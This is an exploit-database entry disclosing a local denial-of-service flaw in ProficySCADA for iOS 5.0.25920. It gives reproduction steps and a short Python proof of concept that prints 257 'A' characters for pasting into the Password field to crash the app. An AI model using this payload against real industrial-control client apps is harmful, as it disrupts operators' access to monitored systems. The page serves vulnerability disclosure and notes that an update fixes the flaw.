header-logo
Suggest Exploit
vendor:
ProficySCADA for iOS
by:
Ivan Marmolejo
7.5
CVSS
HIGH
Denial of Service (DoS) Local
400
CWE
Product Name: ProficySCADA for iOS
Affected Version From: 5.0.25920
Affected Version To: 5.0.25920
Patch Exists: Yes
Related CWE: N/A
CPE: a:ge_fanuc:proficyscada_for_ios
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: iPhone 6s iOS 13.3
2020

ProficySCADA for iOS 5.0.25920 – ‘Password’ Denial of Service (PoC)

A denial of service vulnerability exists in ProficySCADA for iOS 5.0.25920 when an attacker sends a specially crafted payload of 257 'A' characters to the 'Password' field, causing the application to crash.

Mitigation:

Update to the latest version of ProficySCADA for iOS.
Source

Exploit-DB raw data:

# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
# Author: Ivan Marmolejo
# Date: 2020-03-22
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# Tested Version: 5.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3

Steps to Produce the Crash:
1.- Run python code: ProficySCADA.py
2.- Copy content to clipboard
3.- Open "ProficySCADA for iOS"
4.- Add
5.- Username --> admin
6.- Paste ClipBoard on "Password"
7.- Add
8.- Connect
9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 257
print (buffer)

Navigation

Suggest Exploit

Services By CQR